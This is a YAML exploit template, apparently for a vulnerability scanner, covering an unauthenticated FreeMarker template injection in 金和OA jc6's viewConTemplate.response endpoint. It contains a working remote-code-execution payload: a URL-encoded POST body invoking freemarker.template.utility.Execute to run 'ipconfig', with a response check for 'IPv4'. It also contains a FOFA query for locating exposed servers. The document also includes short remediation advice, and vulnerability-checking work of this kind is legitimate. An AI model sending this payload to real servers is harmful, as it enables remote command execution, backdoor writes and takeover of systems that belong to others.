product: 金和OA
vName: 金和OA jc6 viewConTemplate.response 模版注入
type: 代码执行
vID: [ ]
level: 3
vDesc: 金和OA jc6 portalwb-con-template!viewConTemplate.response 接口存在FreeMarker模板注入漏洞，未经身份验证的攻击者可以利用此漏洞远程代码执行、写入后门文件，导致服务器存在被控的风险。
version: ''
note: ''
search:
  FOFA: app="金和网络-金和OA"
protocol: http
link: https://download.csdn.net/blog/column/10118303/136689353
fix:
  - 关闭互联网暴露面或设置接口访问权限
  - 升级至安全版本
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.response
      data: moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522ipconfig%2522%29%257D%253C%252Fclob%253E&uuid=1
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - IPv4
            logic: and